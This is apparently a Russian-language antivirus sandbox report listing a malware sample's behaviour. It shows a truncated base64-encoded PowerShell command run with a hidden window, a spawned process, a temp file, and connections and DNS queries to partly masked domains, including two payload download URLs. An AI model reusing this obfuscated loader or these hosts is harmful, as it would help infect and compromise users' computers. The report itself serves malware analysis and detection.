Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQADUAbAAyAHEAYQBiAD0AKAAoACcAQgB4AGoAbAAnACsAJwA5ACcAKQArACcAOQB0ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAHIAbwBmAGkAbA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1484
- %TEMP%\1291423.cvr
- 'bo####tein.co.za':80
- 'bo####tein.co.za':443
- 'de####alliance.se':80
- 'fi####nes.com.sg':443
- 'ar####bestudio.com':443
- http://bo####tein.co.za/images/Gdc2/
- http://de####alliance.se/wp-admin/iBkjpN5De/
- 'bo####tein.co.za':443
- 'fi####nes.com.sg':443
- 'ar####bestudio.com':443
- DNS ASK bo#####roadesivos.com
- DNS ASK bo####tein.co.za
- DNS ASK de####alliance.se
- DNS ASK fi####nes.com.sg
- DNS ASK nb#z.tk
- DNS ASK ar####bestudio.com
- DNS ASK cu##ros.pe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQADUAbAAyAHEAYQBiAD0AKAAoACcAQgB4AGoAbAAnACsAJwA5ACcAKQArACcAOQB0ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAGUAbgB2ADoAVQBTAGUAcgBQAHIAbwBmAGkAbA... (со скрытым окном)